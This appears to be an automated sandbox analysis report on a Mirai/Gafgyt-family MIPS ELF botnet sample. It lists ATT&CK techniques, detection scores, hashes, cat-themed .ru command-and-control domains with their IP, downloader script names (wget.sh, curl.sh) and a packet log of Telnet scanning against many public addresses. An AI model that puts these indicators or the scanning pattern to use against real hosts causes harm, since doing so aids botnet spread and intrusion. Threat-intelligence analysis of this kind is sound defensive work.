Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	Direct Volume Access	1 Brute Force	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Service Stop
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mips.elf	42%	ReversingLabs	Linux.Backdoor.Gafgyt
mips.elf	46%	Virustotal		Browse
mips.elf	100%	Avira	EXP/ELF.Mirai.W

Name	IP	Active	Malicious	Reputation
cat-are-here.ru	185.93.89.106	true	false	high
cuttiecats.ru	185.93.89.106	true	false	high
mykittler.ru	185.93.89.106	true	false	high
cats-master.ru	185.93.89.106	true	false	high
kittlerer.ru	185.93.89.106	true	false	high
gokittler.ru	185.93.89.106	true	false	high
qittler.ru. [malformed]	unknown	unknown	false	high
gokittler.ru. [malformed]	unknown	unknown	true	unknown
kittler.ru. [malformed]	unknown	unknown	true	unknown
cats-master.ru. [malformed]	unknown	unknown	true	unknown
thekittler.ru. [malformed]	unknown	unknown	true	unknown
newkittler.ru. [malformed]	unknown	unknown	true	unknown
mykittler.ru. [malformed]	unknown	unknown	true	unknown
polizei.su. [malformed]	unknown	unknown	true	unknown
kittlez.ru. [malformed]	unknown	unknown	false	high
kittlerer.ru. [malformed]	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http:///wget.sh	mips.elf	false		high
http:///curl.sh	mips.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
1.186.178.181	unknown	India	45769	DVOIS-IND-VoisBroadbandPvtLtdIN	false
209.123.240.12	unknown	United States	8001	NET-ACCESS-CORPUS	false
123.36.135.99	unknown	Korea Republic of	6619	SAMSUNGSDS-AS-KRSamsungSDSIncKR	false
188.35.191.195	unknown	Russian Federation	34123	NETORN-ASRU	false
78.140.32.79	unknown	Russian Federation	34573	OBERON-ASNRU	false
63.190.64.54	unknown	United States	1239	SPRINTLINKUS	false
25.116.95.17	unknown	United Kingdom	7922	COMCAST-7922US	false
211.140.50.110	unknown	China	56041	CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC	false
133.215.189.21	unknown	Japan	2497	IIJInternetInitiativeJapanIncJP	false
213.248.159.188	unknown	Turkey	8386	KOCNETTR	false
52.94.168.245	unknown	United States	16509	AMAZON-02US	false
108.58.16.54	unknown	United States	6128	CABLE-NET-1US	false
34.163.125.203	unknown	United States	2686	ATGS-MMD-ASUS	false
175.208.67.239	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
160.181.150.86	unknown	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	false
146.247.117.190	unknown	Austria	57037	MKQ-ASDE	false
198.2.243.223	unknown	United States	54600	PEGTECHINCUS	false
192.35.75.23	unknown	United States	29484	RUB-ASDE	false
181.69.121.168	unknown	Colombia	27831	ColombiaMovilCO	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false
75.184.195.174	unknown	United States	10796	TWC-10796-MIDWESTUS	false
163.224.220.195	unknown	Japan	17816	CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi	false
185.93.89.106	cat-are-here.ru	United Kingdom	200861	TS-EMEA-ASNGB	false
175.202.252.137	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
83.43.155.209	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
161.122.26.73	unknown	Korea Republic of	17866	KISTNET-AS-KRKoreaInstituteofScienceandTechnologyKR	false
211.3.132.140	unknown	Japan	4725	ODNSoftBankMobileCorpJP	false
197.122.2.94	unknown	Egypt	36992	ETISALAT-MISREG	false
88.171.2.111	unknown	France	12322	PROXADFR	false
134.12.253.14	unknown	United States	270	AS270US	false
41.83.76.194	unknown	Senegal	8346	SONATEL-ASAutonomousSystemEU	false
202.10.137.75	unknown	Australia	136518	WA-GOVERNMENT-AS-APWAGovernmentprojectAU	false
167.37.240.222	unknown	Canada	2665	CDAGOVNCA	false
163.135.230.101	unknown	Japan	4673	INTERVIANTTDATACORPORATIONJP	false
38.207.138.11	unknown	United States	9009	M247GB	false
32.79.80.242	unknown	United States	2686	ATGS-MMD-ASUS	false
28.225.89.160	unknown	United States	7922	COMCAST-7922US	false
11.152.5.38	unknown	United States	3356	LEVEL3US	false
63.174.223.29	unknown	United States	1239	SPRINTLINKUS	false
52.238.108.30	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
50.21.2.183	unknown	United States	17184	ATL-CBEYONDUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
91.189.91.43	arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm5.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	klfarm.elf	Get hash	malicious	Unknown	Browse
	kflarm7.elf	Get hash	malicious	Unknown	Browse
	bot.arm5.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	bot.x86_64.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	.Smpsl.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm7.elf	Get hash	malicious	Mirai	Browse
	dlr.arm5.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	klfarm.elf	Get hash	malicious	Unknown	Browse
	kflarm7.elf	Get hash	malicious	Unknown	Browse
	bot.arm5.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	bot.x86_64.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	.Smpsl.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mykittler.ru	rep.arm7.elf	Get hash	malicious	Mirai	Browse	156.229.232.99
cats-master.ru	arm7.elf	Get hash	malicious	Mirai	Browse	185.93.89.106
	rep.ppc.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
	arm4.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
cat-are-here.ru	arm7.elf	Get hash	malicious	Mirai	Browse	185.93.89.106
cat-are-here.ru	mips.elf	Get hash	malicious	Unknown	Browse	156.229.232.99
cuttiecats.ru	rep.arm5.elf	Get hash	malicious	Unknown	Browse	156.229.232.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SAMSUNGSDS-AS-KRSamsungSDSIncKR	botnet.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	182.197.254.66
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	122.101.20.211
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	123.44.15.189
	sora.mips.elf	Get hash	malicious	Mirai	Browse	211.189.29.131
	Hgf.sh4.elf	Get hash	malicious	Mirai	Browse	182.194.71.95
	Hgf.x86.elf	Get hash	malicious	Mirai	Browse	123.36.126.32
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	123.42.125.135
	botx.m68k.elf	Get hash	malicious	Mirai	Browse	123.43.36.122
	telnet.mpsl.elf	Get hash	malicious	Gafgyt, Mirai	Browse	165.213.18.224
	arm5.elf	Get hash	malicious	Unknown	Browse	123.47.210.148
NET-ACCESS-CORPUS	https://storage.googleapis.com/xscdsxcdsxscd/urusmansory.html#dazdaz.html?od=1syw67963ab90e83d_vl_twentyvl_15s4.20qkq6m.O0000rj86o329yy012_x11504.j86o3MHF6dWJ5LTNhNXVic2Q0x697l	Get hash	malicious	Phisher	Browse	207.99.58.98
	http://storage.googleapis.com/hsdhjfsdf/gooogle.html#/redirect.html?syw=1x1675702edd8221_vl_twenty.j86ld0qzuby-0moccdj.20qkq6m.UagJhDKMHF6dWJ5LTBtb2NjZGo0f2czT	Get hash	malicious	Phisher	Browse	207.99.58.98
	telnet.spc.elf	Get hash	malicious	Unknown	Browse	67.196.72.110
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	66.29.82.42
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	66.29.106.89
	87.121.112.22-arm-2025-01-16T06_52_38.elf	Get hash	malicious	Unknown	Browse	209.123.121.233
	5.elf	Get hash	malicious	Unknown	Browse	67.196.24.200
	armv5l.elf	Get hash	malicious	Unknown	Browse	66.246.149.120
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	209.123.28.188
	armv5l.elf	Get hash	malicious	Mirai	Browse	209.123.54.51
DVOIS-IND-VoisBroadbandPvtLtdIN	154.213.189.141-mips-2025-01-21T03_19_06.elf	Get hash	malicious	Mirai, Moobot	Browse	1.186.8.76
	armv7l.elf	Get hash	malicious	Mirai	Browse	202.122.17.225
	spc.elf	Get hash	malicious	Mirai	Browse	1.186.123.160
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	114.79.185.100
	na.elf	Get hash	malicious	Mirai	Browse	1.186.123.112
	sh4.elf	Get hash	malicious	Mirai	Browse	202.122.17.232
	S4kCacU4pQ.elf	Get hash	malicious	Gafgyt, Mirai	Browse	202.122.17.222
	Tw6PiXhrrV.elf	Get hash	malicious	Unknown	Browse	114.79.137.214
	sora.x86.elf	Get hash	malicious	Mirai	Browse	1.186.123.165
	YrwQEQwAlQ.elf	Get hash	malicious	Mirai	Browse	202.122.17.246

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.672518079029429
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mips.elf
File size:	121'692 bytes
MD5:	3c8a517caf2e285e584747f21b3c90e3
SHA1:	7e795c9512d298a5f497f6a946a5a0b04ff3ffd4
SHA256:	0c4618c5f0a988c3f0205aab766a9b48d71d649e3c1a49042b1df90b949a5a5b
SHA512:	622c9055cc18c9cee685c6d56b92c30343b6b113763bb7c9b4c124f91cca251a20421887da93408b8fa42e67655bc0fa3c10fd2525808b729bcb73b1994956b7
SSDEEP:	3072:EC/mb45PSvD5LVkThqiQwQFJmUE1PDz1tnm3Vwte/slxqIauY6J3Z029qTul27WL:Emmb4AjjDIuIy3NQ
TLSH:	BBC3961A2E3C4F5DF77A857AC7F389218B6476421AE1CB4DD26CFD025A7030D241B7AA
File Content Preview:	.ELF.....................@.`...4...,.....4. ...(.............@...@...........................E...E........:.........dt.Q............................<...'.S....!'.......................<...'.Sh...!... ....'9... ......................<...'.S8...!........'9.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	121132
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x19580	0x0	0x6	AX	16
.fini	PROGBITS	0x4196a0	0x196a0	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x419700	0x19700	0x3080	0x0	0x2	A	16
.ctors	PROGBITS	0x45d000	0x1d000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x45d008	0x1d008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x45d014	0x1d014	0xe0	0x0	0x3	WA	4
.data	PROGBITS	0x45d100	0x1d100	0x330	0x0	0x3	WA	16
.got	PROGBITS	0x45d430	0x1d430	0x498	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x45d8c8	0x1d8c8	0x24	0x0	0x10000003	WAp	4
.bss	NOBITS	0x45d8f0	0x1d8c8	0x31c8	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0x9ea	0x1d8c8	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x1d8c8	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x1c780	0x1c780	5.7609	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x1d000	0x45d000	0x45d000	0x8c8	0x3ab8	3.6598	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 343
• 38241 undefined
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)
• 23 (Telnet)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2025 20:19:04.647418976 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 20:19:06.030673027 CET	56048	23	192.168.2.23	192.35.75.23
Feb 10, 2025 20:19:06.035502911 CET	23	56048	192.35.75.23	192.168.2.23
Feb 10, 2025 20:19:06.035654068 CET	56048	23	192.168.2.23	192.35.75.23
Feb 10, 2025 20:19:06.036427975 CET	49576	23	192.168.2.23	188.35.191.195
Feb 10, 2025 20:19:06.039309978 CET	34310	23	192.168.2.23	25.116.95.17
Feb 10, 2025 20:19:06.041223049 CET	23	49576	188.35.191.195	192.168.2.23
Feb 10, 2025 20:19:06.041270971 CET	49576	23	192.168.2.23	188.35.191.195
Feb 10, 2025 20:19:06.042927980 CET	49436	23	192.168.2.23	211.140.50.110
Feb 10, 2025 20:19:06.044101000 CET	23	34310	25.116.95.17	192.168.2.23
Feb 10, 2025 20:19:06.044183016 CET	34310	23	192.168.2.23	25.116.95.17
Feb 10, 2025 20:19:06.045957088 CET	43680	23	192.168.2.23	41.83.76.194
Feb 10, 2025 20:19:06.047702074 CET	23	49436	211.140.50.110	192.168.2.23
Feb 10, 2025 20:19:06.047825098 CET	49436	23	192.168.2.23	211.140.50.110
Feb 10, 2025 20:19:06.049808025 CET	39702	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:06.050741911 CET	23	43680	41.83.76.194	192.168.2.23
Feb 10, 2025 20:19:06.050811052 CET	43680	23	192.168.2.23	41.83.76.194
Feb 10, 2025 20:19:06.051585913 CET	55204	23	192.168.2.23	163.224.220.195
Feb 10, 2025 20:19:06.054600954 CET	40202	23	192.168.2.23	175.202.252.137
Feb 10, 2025 20:19:06.054610968 CET	38241	39702	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:06.054686069 CET	39702	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:06.056380033 CET	23	55204	163.224.220.195	192.168.2.23
Feb 10, 2025 20:19:06.056443930 CET	55204	23	192.168.2.23	163.224.220.195
Feb 10, 2025 20:19:06.059132099 CET	43386	23	192.168.2.23	75.184.195.174
Feb 10, 2025 20:19:06.059423923 CET	39702	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:06.059449911 CET	23	40202	175.202.252.137	192.168.2.23
Feb 10, 2025 20:19:06.059537888 CET	40202	23	192.168.2.23	175.202.252.137
Feb 10, 2025 20:19:06.062211037 CET	37126	23	192.168.2.23	108.58.16.54
Feb 10, 2025 20:19:06.063900948 CET	23	43386	75.184.195.174	192.168.2.23
Feb 10, 2025 20:19:06.064229012 CET	38241	39702	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:06.064230919 CET	43386	23	192.168.2.23	75.184.195.174
Feb 10, 2025 20:19:06.064296007 CET	39702	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:06.065754890 CET	42352	23	192.168.2.23	197.122.2.94
Feb 10, 2025 20:19:06.067074060 CET	23	37126	108.58.16.54	192.168.2.23
Feb 10, 2025 20:19:06.067147970 CET	37126	23	192.168.2.23	108.58.16.54
Feb 10, 2025 20:19:06.068775892 CET	37104	23	192.168.2.23	163.135.230.101
Feb 10, 2025 20:19:06.069039106 CET	38241	39702	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:06.070580006 CET	23	42352	197.122.2.94	192.168.2.23
Feb 10, 2025 20:19:06.070712090 CET	42352	23	192.168.2.23	197.122.2.94
Feb 10, 2025 20:19:06.073584080 CET	23	37104	163.135.230.101	192.168.2.23
Feb 10, 2025 20:19:06.073734045 CET	37104	23	192.168.2.23	163.135.230.101
Feb 10, 2025 20:19:06.074599981 CET	53222	23	192.168.2.23	181.69.121.168
Feb 10, 2025 20:19:06.077147961 CET	33864	23	192.168.2.23	63.190.64.54
Feb 10, 2025 20:19:06.079371929 CET	23	53222	181.69.121.168	192.168.2.23
Feb 10, 2025 20:19:06.079421997 CET	53222	23	192.168.2.23	181.69.121.168
Feb 10, 2025 20:19:06.080574036 CET	45722	23	192.168.2.23	34.163.125.203
Feb 10, 2025 20:19:06.081892014 CET	23	33864	63.190.64.54	192.168.2.23
Feb 10, 2025 20:19:06.081974030 CET	33864	23	192.168.2.23	63.190.64.54
Feb 10, 2025 20:19:06.083734035 CET	49688	23	192.168.2.23	134.12.253.14
Feb 10, 2025 20:19:06.085362911 CET	23	45722	34.163.125.203	192.168.2.23
Feb 10, 2025 20:19:06.085431099 CET	45722	23	192.168.2.23	34.163.125.203
Feb 10, 2025 20:19:06.086987019 CET	48540	23	192.168.2.23	38.207.138.11
Feb 10, 2025 20:19:06.088562012 CET	23	49688	134.12.253.14	192.168.2.23
Feb 10, 2025 20:19:06.088752985 CET	49688	23	192.168.2.23	134.12.253.14
Feb 10, 2025 20:19:06.090240955 CET	37184	23	192.168.2.23	160.181.150.86
Feb 10, 2025 20:19:06.091764927 CET	23	48540	38.207.138.11	192.168.2.23
Feb 10, 2025 20:19:06.092314005 CET	48540	23	192.168.2.23	38.207.138.11
Feb 10, 2025 20:19:06.095011950 CET	23	37184	160.181.150.86	192.168.2.23
Feb 10, 2025 20:19:06.100301027 CET	37184	23	192.168.2.23	160.181.150.86
Feb 10, 2025 20:19:06.142833948 CET	43776	23	192.168.2.23	209.123.240.12
Feb 10, 2025 20:19:06.147634029 CET	23	43776	209.123.240.12	192.168.2.23
Feb 10, 2025 20:19:06.147720098 CET	43776	23	192.168.2.23	209.123.240.12
Feb 10, 2025 20:19:06.149333954 CET	33348	23	192.168.2.23	88.171.2.111
Feb 10, 2025 20:19:06.154145956 CET	23	33348	88.171.2.111	192.168.2.23
Feb 10, 2025 20:19:06.154239893 CET	33348	23	192.168.2.23	88.171.2.111
Feb 10, 2025 20:19:06.154572964 CET	60208	23	192.168.2.23	11.152.5.38
Feb 10, 2025 20:19:06.157834053 CET	37996	23	192.168.2.23	175.208.67.239
Feb 10, 2025 20:19:06.159720898 CET	23	60208	11.152.5.38	192.168.2.23
Feb 10, 2025 20:19:06.159831047 CET	60208	23	192.168.2.23	11.152.5.38
Feb 10, 2025 20:19:06.162041903 CET	34928	23	192.168.2.23	123.36.135.99
Feb 10, 2025 20:19:06.162648916 CET	23	37996	175.208.67.239	192.168.2.23
Feb 10, 2025 20:19:06.162699938 CET	37996	23	192.168.2.23	175.208.67.239
Feb 10, 2025 20:19:06.167099953 CET	23	34928	123.36.135.99	192.168.2.23
Feb 10, 2025 20:19:06.170519114 CET	34928	23	192.168.2.23	123.36.135.99
Feb 10, 2025 20:19:06.242712975 CET	42214	23	192.168.2.23	83.43.155.209
Feb 10, 2025 20:19:06.247631073 CET	23	42214	83.43.155.209	192.168.2.23
Feb 10, 2025 20:19:06.247720957 CET	42214	23	192.168.2.23	83.43.155.209
Feb 10, 2025 20:19:06.264246941 CET	36574	23	192.168.2.23	167.37.240.222
Feb 10, 2025 20:19:06.269036055 CET	23	36574	167.37.240.222	192.168.2.23
Feb 10, 2025 20:19:06.269108057 CET	36574	23	192.168.2.23	167.37.240.222
Feb 10, 2025 20:19:06.274498940 CET	53256	23	192.168.2.23	161.122.26.73
Feb 10, 2025 20:19:06.279319048 CET	23	53256	161.122.26.73	192.168.2.23
Feb 10, 2025 20:19:06.279426098 CET	53256	23	192.168.2.23	161.122.26.73
Feb 10, 2025 20:19:06.279429913 CET	42664	23	192.168.2.23	146.247.117.190
Feb 10, 2025 20:19:06.284208059 CET	23	42664	146.247.117.190	192.168.2.23
Feb 10, 2025 20:19:06.286890030 CET	42664	23	192.168.2.23	146.247.117.190
Feb 10, 2025 20:19:06.309957981 CET	50474	23	192.168.2.23	1.186.178.181
Feb 10, 2025 20:19:06.314908028 CET	23	50474	1.186.178.181	192.168.2.23
Feb 10, 2025 20:19:06.316860914 CET	50474	23	192.168.2.23	1.186.178.181
Feb 10, 2025 20:19:06.321647882 CET	34636	23	192.168.2.23	133.215.189.21
Feb 10, 2025 20:19:06.326530933 CET	23	34636	133.215.189.21	192.168.2.23
Feb 10, 2025 20:19:06.326591015 CET	34636	23	192.168.2.23	133.215.189.21
Feb 10, 2025 20:19:06.328609943 CET	43694	23	192.168.2.23	32.79.80.242
Feb 10, 2025 20:19:06.333405972 CET	23	43694	32.79.80.242	192.168.2.23
Feb 10, 2025 20:19:06.334239960 CET	43694	23	192.168.2.23	32.79.80.242
Feb 10, 2025 20:19:06.359244108 CET	36556	23	192.168.2.23	211.3.132.140
Feb 10, 2025 20:19:06.364067078 CET	23	36556	211.3.132.140	192.168.2.23
Feb 10, 2025 20:19:06.364125013 CET	36556	23	192.168.2.23	211.3.132.140
Feb 10, 2025 20:19:06.366238117 CET	48054	23	192.168.2.23	198.2.243.223
Feb 10, 2025 20:19:06.371018887 CET	23	48054	198.2.243.223	192.168.2.23
Feb 10, 2025 20:19:06.374377966 CET	48054	23	192.168.2.23	198.2.243.223
Feb 10, 2025 20:19:06.386943102 CET	50032	23	192.168.2.23	202.10.137.75
Feb 10, 2025 20:19:06.391725063 CET	23	50032	202.10.137.75	192.168.2.23
Feb 10, 2025 20:19:06.391833067 CET	50032	23	192.168.2.23	202.10.137.75
Feb 10, 2025 20:19:06.393668890 CET	39346	23	192.168.2.23	213.248.159.188
Feb 10, 2025 20:19:06.398458958 CET	23	39346	213.248.159.188	192.168.2.23
Feb 10, 2025 20:19:06.398526907 CET	39346	23	192.168.2.23	213.248.159.188
Feb 10, 2025 20:19:06.401721001 CET	37104	23	192.168.2.23	52.94.168.245
Feb 10, 2025 20:19:06.406510115 CET	23	37104	52.94.168.245	192.168.2.23
Feb 10, 2025 20:19:06.406573057 CET	37104	23	192.168.2.23	52.94.168.245
Feb 10, 2025 20:19:06.409133911 CET	37976	23	192.168.2.23	78.140.32.79
Feb 10, 2025 20:19:06.413912058 CET	23	37976	78.140.32.79	192.168.2.23
Feb 10, 2025 20:19:06.413990021 CET	37976	23	192.168.2.23	78.140.32.79
Feb 10, 2025 20:19:06.414948940 CET	34672	23	192.168.2.23	63.174.223.29
Feb 10, 2025 20:19:06.419735909 CET	23	34672	63.174.223.29	192.168.2.23
Feb 10, 2025 20:19:06.419795036 CET	34672	23	192.168.2.23	63.174.223.29
Feb 10, 2025 20:19:06.422014952 CET	55416	23	192.168.2.23	50.21.2.183
Feb 10, 2025 20:19:06.426763058 CET	23	55416	50.21.2.183	192.168.2.23
Feb 10, 2025 20:19:06.426820993 CET	55416	23	192.168.2.23	50.21.2.183
Feb 10, 2025 20:19:06.427267075 CET	55218	23	192.168.2.23	28.225.89.160
Feb 10, 2025 20:19:06.432073116 CET	23	55218	28.225.89.160	192.168.2.23
Feb 10, 2025 20:19:06.432400942 CET	55218	23	192.168.2.23	28.225.89.160
Feb 10, 2025 20:19:06.436126947 CET	58640	23	192.168.2.23	52.238.108.30
Feb 10, 2025 20:19:06.440918922 CET	23	58640	52.238.108.30	192.168.2.23
Feb 10, 2025 20:19:06.441003084 CET	58640	23	192.168.2.23	52.238.108.30
Feb 10, 2025 20:19:06.681700945 CET	38241	39702	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:06.681776047 CET	39702	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:06.681968927 CET	39702	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:06.726537943 CET	58640	23	192.168.2.23	52.238.108.30
Feb 10, 2025 20:19:06.726572990 CET	34672	23	192.168.2.23	63.174.223.29
Feb 10, 2025 20:19:06.726608992 CET	39346	23	192.168.2.23	213.248.159.188
Feb 10, 2025 20:19:06.726623058 CET	55218	23	192.168.2.23	28.225.89.160
Feb 10, 2025 20:19:06.726623058 CET	55416	23	192.168.2.23	50.21.2.183
Feb 10, 2025 20:19:06.726623058 CET	37976	23	192.168.2.23	78.140.32.79
Feb 10, 2025 20:19:06.726623058 CET	37104	23	192.168.2.23	52.94.168.245
Feb 10, 2025 20:19:06.726629972 CET	48054	23	192.168.2.23	198.2.243.223
Feb 10, 2025 20:19:06.726629972 CET	36556	23	192.168.2.23	211.3.132.140
Feb 10, 2025 20:19:06.726630926 CET	50032	23	192.168.2.23	202.10.137.75
Feb 10, 2025 20:19:06.726644039 CET	34636	23	192.168.2.23	133.215.189.21
Feb 10, 2025 20:19:06.726663113 CET	43694	23	192.168.2.23	32.79.80.242
Feb 10, 2025 20:19:06.726686001 CET	53256	23	192.168.2.23	161.122.26.73
Feb 10, 2025 20:19:06.726686001 CET	50474	23	192.168.2.23	1.186.178.181
Feb 10, 2025 20:19:06.726686001 CET	42664	23	192.168.2.23	146.247.117.190
Feb 10, 2025 20:19:06.726739883 CET	37996	23	192.168.2.23	175.208.67.239
Feb 10, 2025 20:19:06.726742029 CET	34928	23	192.168.2.23	123.36.135.99
Feb 10, 2025 20:19:06.726757050 CET	60208	23	192.168.2.23	11.152.5.38
Feb 10, 2025 20:19:06.726764917 CET	37184	23	192.168.2.23	160.181.150.86
Feb 10, 2025 20:19:06.726764917 CET	36574	23	192.168.2.23	167.37.240.222
Feb 10, 2025 20:19:06.726764917 CET	43776	23	192.168.2.23	209.123.240.12
Feb 10, 2025 20:19:06.726783991 CET	42214	23	192.168.2.23	83.43.155.209
Feb 10, 2025 20:19:06.726783991 CET	33348	23	192.168.2.23	88.171.2.111
Feb 10, 2025 20:19:06.726787090 CET	48540	23	192.168.2.23	38.207.138.11
Feb 10, 2025 20:19:06.726794004 CET	49688	23	192.168.2.23	134.12.253.14
Feb 10, 2025 20:19:06.726798058 CET	45722	23	192.168.2.23	34.163.125.203
Feb 10, 2025 20:19:06.726811886 CET	33864	23	192.168.2.23	63.190.64.54
Feb 10, 2025 20:19:06.726826906 CET	53222	23	192.168.2.23	181.69.121.168
Feb 10, 2025 20:19:06.726830006 CET	37104	23	192.168.2.23	163.135.230.101
Feb 10, 2025 20:19:06.726839066 CET	42352	23	192.168.2.23	197.122.2.94
Feb 10, 2025 20:19:06.726840973 CET	43386	23	192.168.2.23	75.184.195.174
Feb 10, 2025 20:19:06.726840973 CET	37126	23	192.168.2.23	108.58.16.54
Feb 10, 2025 20:19:06.726851940 CET	40202	23	192.168.2.23	175.202.252.137
Feb 10, 2025 20:19:06.726880074 CET	55204	23	192.168.2.23	163.224.220.195
Feb 10, 2025 20:19:06.726886034 CET	43680	23	192.168.2.23	41.83.76.194
Feb 10, 2025 20:19:06.726903915 CET	49436	23	192.168.2.23	211.140.50.110
Feb 10, 2025 20:19:06.726910114 CET	34310	23	192.168.2.23	25.116.95.17
Feb 10, 2025 20:19:06.726924896 CET	56048	23	192.168.2.23	192.35.75.23
Feb 10, 2025 20:19:06.726933956 CET	49576	23	192.168.2.23	188.35.191.195
Feb 10, 2025 20:19:06.734597921 CET	23	49576	188.35.191.195	192.168.2.23
Feb 10, 2025 20:19:06.734662056 CET	23	34310	25.116.95.17	192.168.2.23
Feb 10, 2025 20:19:06.734668016 CET	23	56048	192.35.75.23	192.168.2.23
Feb 10, 2025 20:19:06.734678984 CET	23	49436	211.140.50.110	192.168.2.23
Feb 10, 2025 20:19:06.734683990 CET	23	43680	41.83.76.194	192.168.2.23
Feb 10, 2025 20:19:06.734694004 CET	23	55204	163.224.220.195	192.168.2.23
Feb 10, 2025 20:19:06.734699011 CET	23	40202	175.202.252.137	192.168.2.23
Feb 10, 2025 20:19:06.734704018 CET	23	42352	197.122.2.94	192.168.2.23
Feb 10, 2025 20:19:06.734709024 CET	23	37126	108.58.16.54	192.168.2.23
Feb 10, 2025 20:19:06.734714031 CET	23	43386	75.184.195.174	192.168.2.23
Feb 10, 2025 20:19:06.734775066 CET	23	37104	163.135.230.101	192.168.2.23
